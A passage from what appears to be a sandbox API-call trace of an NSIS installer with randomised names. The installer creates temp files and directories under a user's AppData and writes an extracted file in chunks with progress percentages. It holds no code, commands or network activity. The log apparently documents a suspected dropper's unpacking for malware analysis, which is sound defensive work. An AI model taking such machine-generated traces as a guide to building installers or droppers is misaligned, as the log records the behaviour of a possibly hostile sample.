lpOverlapped=0x0 | out: lpBuffer=0x19fdf0*, lpNumberOfBytesRead=0x19fcb0*=0x4, lpOverlapped=0x0) returned 1 [0171.483] GetTickCount () returned 0x177706e [0171.483] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsu", uUnique=0x0, lpTempFileName=0x19fcc0 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsu2FBB.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsu2fbb.tmp")) returned 0x2fbb [0171.483] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsu2FBB.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsu2fbb.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x4000100, hTemplateFile=0x0) returned 0x1d4 [0171.483] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=32284, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7e1c [0171.483] GetTickCount () returned 0x177706e [0171.483] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=32284, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7e1c [0171.484] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.484] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fc68, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19fc68*=0x4000, lpOverlapped=0x0) returned 1 [0171.849] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x5195, lpNumberOfBytesWritten=0x19fc7c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19fc7c*=0x5195, lpOverlapped=0x0) returned 1 [0171.851] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.851] ReadFile (in: hFile=0x1d4, lpBuffer=0x19fca4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fc98, lpOverlapped=0x0 | out: lpBuffer=0x19fca4*, lpNumberOfBytesRead=0x19fc98*=0x4, lpOverlapped=0x0) returned 1 [0171.851] GetTickCount () returned 0x17771d6 [0171.851] ReadFile (in: hFile=0x1d4, lpBuffer=0x476c70, nNumberOfBytesToRead=0x1356, lpNumberOfBytesRead=0x19fc98, lpOverlapped=0x0 | out: lpBuffer=0x476c70*, lpNumberOfBytesRead=0x19fc98*=0x1356, lpOverlapped=0x0) returned 1 [0171.852] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74f30000 [0171.852] GetProcAddress (hModule=0x74f30000, lpProcName="GetUserDefaultUILanguage") returned 0x74f4b0a0 [0171.852] GetUserDefaultUILanguage () returned 0x409 [0171.852] wsprintfA (in: param_1=0x42a000, param_2="%d" | out: param_1="1033") returned 4 [0171.852] wsprintfA (in: param_1=0x42a000, param_2="%d" | out: param_1="1033") returned 4 [0171.852] lstrlenA (lpString="fwwmjbqpxzax") returned 12 [0171.852] lstrcpynA (in: lpString1=0x4236a0, lpString2="fwwmjbqpxzax Setup", iMaxLength=1024 | out: lpString1="fwwmjbqpxzax Setup") returned="fwwmjbqpxzax Setup" [0171.852] SetWindowTextA (hWnd=0x0, lpString="fwwmjbqpxzax Setup") returned 0 [0171.852] lstrcpynA (in: lpString1=0x476e34, lpString2="nuvqoauyaez", iMaxLength=1024 | out: lpString1="nuvqoauyaez") returned="nuvqoauyaez" [0171.852] lstrcpynA (in: lpString1=0x4218a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0171.853] lstrcpynA (in: lpString1=0x4218a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0171.853] lstrcpynA (in: lpString1=0x422e40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0171.853] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0171.853] lstrcpynA (in: lpString1=0x429400, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0171.853] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x800ff [0171.857] wsprintfA (in: param_1=0x42a000, param_2="%d" | out: param_1="1033") returned 4 [0171.857] lstrlenA (lpString="fwwmjbqpxzax") returned 12 [0171.857] lstrcpynA (in: lpString1=0x4236a0, lpString2="fwwmjbqpxzax Setup", iMaxLength=1024 | out: lpString1="fwwmjbqpxzax Setup") returned="fwwmjbqpxzax Setup" [0171.857] SetWindowTextA (hWnd=0x0, lpString="fwwmjbqpxzax Setup") returned 0 [0171.857] lstrcpynA (in: lpString1=0x476e34, lpString2="nuvqoauyaez", iMaxLength=1024 | out: lpString1="nuvqoauyaez") returned="nuvqoauyaez" [0171.857] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0171.857] LoadLibraryA (lpLibFileName="RichEd20") returned 0x67d70000 [0176.409] GetClassInfoA (in: hInstance=0x0, lpClassName="RichEdit20A", lpWndClass=0x423640 | out: lpWndClass=0x423640) returned 1 [0176.415] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403964, dwInitParam=0x0) returned 0x0 [0176.473] GetDlgItem (hDlg=0x30460, nIDDlgItem=1) returned 0x30446 [0176.473] GetDlgItem (hDlg=0x30460, nIDDlgItem=2) returned 0x30424 [0176.473] SetDlgItemTextA (hDlg=0x30460, nIDDlgItem=1028, lpString="Nullsoft Install System v2.40") returned 1 [0176.473] SetClassLongA (hWnd=0x30460, nIndex=-14, dwNewLong=524543) returned 0x0 [0176.476] lstrcpynA (in: lpString1=0x422e40, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0176.476] lstrlenA (lpString="") returned 0 [0176.476] lstrcpynA (in: lpString1=0x40a368, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0176.476] lstrcpynA (in: lpString1=0x40a768, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0176.476] lstrcmpiA (lpString1="", lpString2="") returned 0 [0176.476] lstrcpynA (in: lpString1=0x422e40, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0176.477] lstrlenA (lpString="") returned 0 [0176.477] lstrcpynA (in: lpString1=0x48e274, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0176.477] lstrcpynA (in: lpString1=0x422e40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0176.477] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0176.477] lstrcpynA (in: lpString1=0x409f68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0176.477] GetTickCount () returned 0x1778b55 [0176.477] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsr", uUnique=0x0, lpTempFileName=0x424000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr4335.tmp")) returned 0x4335 [0176.478] lstrcpynA (in: lpString1=0x422e40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.478] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0176.478] lstrcpynA (in: lpString1=0x409b68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.479] lstrcpynA (in: lpString1=0x4218a0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.479] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0176.479] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", lpFindFileData=0x4224e8 | out: lpFindFileData=0x4224e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a99e6f6, ftCreationTime.dwHighDateTime=0x1d81e4a, ftLastAccessTime.dwLowDateTime=0x2a99e6f6, ftLastAccessTime.dwHighDateTime=0x1d81e4a, ftLastWriteTime.dwLowDateTime=0x2a99e6f6, ftLastWriteTime.dwHighDateTime=0x1d81e4a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f004c, dwReserved1=0x610063, cFileName="nsr4335.tmp", cAlternateFileName="")) returned 0x456cc0 [0176.480] FindClose (in: hFindFile=0x456cc0 | out: hFindFile=0x456cc0) returned 1 [0176.480] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr4335.tmp")) returned 1 [0176.481] lstrcpynA (in: lpString1=0x422e40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.481] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0176.481] lstrcpynA (in: lpString1=0x409f68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.481] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0176.481] GetLastError () returned 0xb7 [0176.481] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0176.481] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0176.482] GetLastError () returned 0xb7 [0176.482] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0176.482] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0176.482] GetLastError () returned 0xb7 [0176.482] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0176.482] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0176.482] GetLastError () returned 0xb7 [0176.483] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0176.483] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0176.483] GetLastError () returned 0xb7 [0176.483] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0176.483] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsr4335.tmp"), lpSecurityAttributes=0x0) returned 1 [0176.484] lstrcpynA (in: lpString1=0x422e40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.484] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0176.484] lstrcpynA (in: lpString1=0x409b68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.484] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned 48 [0176.484] lstrcpynA (in: lpString1=0x42a800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsr4335.tmp" [0176.484] lstrcpynA (in: lpString1=0x424000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0176.485] lstrcpynA (in: lpString1=0x422e40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0176.485] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0176.485] lstrcpynA (in: lpString1=0x409f68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0176.485] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0176.485] GetLastError () returned 0xb7 [0176.485] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0176.486] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0176.486] GetLastError () returned 0xb7 [0176.486] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0176.486] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0176.487] GetLastError () returned 0xb7 [0176.487] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0176.487] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0176.487] GetLastError () returned 0xb7 [0176.487] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0176.487] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0176.487] GetLastError () returned 0xb7 [0176.487] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0176.487] lstrcpynA (in: lpString1=0x429800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0176.488] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0176.488] lstrcpynA (in: lpString1=0x40a768, lpString2="2v0cucir72x", iMaxLength=1024 | out: lpString1="2v0cucir72x") returned="2v0cucir72x" [0176.488] lstrcpynA (in: lpString1=0x409b68, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0176.488] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0176.488] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0176.488] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="2v0cucir72x" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2v0cucir72x") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2v0cucir72x" [0176.488] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2v0cucir72x" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2v0cucir72x")) returned 0xffffffff [0176.488] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2v0cucir72x" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2v0cucir72x")) returned 0xffffffff [0176.489] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2v0cucir72x" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2v0cucir72x"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0176.489] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=4954, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x135a [0176.489] GetTickCount () returned 0x1778b64 [0176.489] ReadFile (in: hFile=0x1d4, lpBuffer=0x19f784, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f778, lpOverlapped=0x0 | out: lpBuffer=0x19f784*, lpNumberOfBytesRead=0x19f778*=0x4, lpOverlapped=0x0) returned 1 [0176.489] GetTickCount () returned 0x1778b64 [0176.489] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=48668, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbe1c [0176.489] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20885, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5195 [0176.489] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0176.490] GetTickCount () returned 0x1778b64 [0176.493] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x4241, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x4241, lpOverlapped=0x0) returned 1 [0176.494] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0176.494] GetTickCount () returned 0x1778b64 [0177.207] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x49a9, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x49a9, lpOverlapped=0x0) returned 1 [0177.208] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.208] GetTickCount () returned 0x1778e33 [0177.208] MulDiv (nNumber=35818, nNumerator=100, nDenominator=203681) returned 18 [0177.208] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 18%") returned 7 [0177.211] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x4818, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x4818, lpOverlapped=0x0) returned 1 [0177.212] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.212] GetTickCount () returned 0x1778e33 [0177.212] MulDiv (nNumber=54274, nNumerator=100, nDenominator=203681) returned 27 [0177.212] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 27%") returned 7 [0177.218] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x5c99, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x5c99, lpOverlapped=0x0) returned 1 [0177.219] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.219] GetTickCount () returned 0x1778e43 [0177.219] MulDiv (nNumber=77979, nNumerator=100, nDenominator=203681) returned 38 [0177.219] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 38%") returned 7 [0177.221] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x657f, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x657f, lpOverlapped=0x0) returned 1 [0177.222] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.222] GetTickCount () returned 0x1778e43 [0177.222] MulDiv (nNumber=103962, nNumerator=100, nDenominator=203681) returned 51 [0177.222] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 51%") returned 7 [0177.224] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x3f13, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x3f13, lpOverlapped=0x0) returned 1 [0177.225] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.225] GetTickCount () returned 0x1778e43 [0177.225] MulDiv (nNumber=120109, nNumerator=100, nDenominator=203681) returned 59 [0177.225] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 59%") returned 7 [0177.227] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x3f1e, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x3f1e, lpOverlapped=0x0) returned 1 [0177.227] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.227] GetTickCount () returned 0x1778e43 [0177.228] MulDiv (nNumber=136267, nNumerator=100, nDenominator=203681) returned 67 [0177.228] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 67%") returned 7 [0177.230] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x3f24, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x3f24, lpOverlapped=0x0) returned 1 [0177.231] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.231] GetTickCount () returned 0x1778e52 [0177.231] MulDiv (nNumber=152431, nNumerator=100, nDenominator=203681) returned 75 [0177.231] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 75%") returned 7 [0177.233] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x3f27, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x3f27, lpOverlapped=0x0) returned 1 [0177.234] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.234] GetTickCount () returned 0x1778e52 [0177.234] MulDiv (nNumber=168598, nNumerator=100, nDenominator=203681) returned 83 [0177.234] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 83%") returned 7 [0177.236] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, nNumberOfBytesToWrite=0x3f2e, lpNumberOfBytesWritten=0x19f75c, lpOverlapped=0x0 | out: lpBuffer=0x40b038*, lpNumberOfBytesWritten=0x19f75c*=0x3f2e, lpOverlapped=0x0) returned 1 [0177.237] ReadFile (in: hFile=0x1c8, lpBuffer=0x413038, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f748, lpOverlapped=0x0 | out: lpBuffer=0x413038*, lpNumberOfBytesRead=0x19f748*=0x4000, lpOverlapped=0x0) returned 1 [0177.237] GetTickCount () returned 0x1778e52 [0177.237] MulDiv (nNumber=184772, nNumerator=100, nDenominator=203681) returned 91 [0177.237] wsprintfA (in: param_1=0x19f700, param_2="... %d%%" | out: param_1="... 91%") returned 7 [0177.239] WriteFile (in: hFile=0x1d4, lpBuffer=0x40b038*, 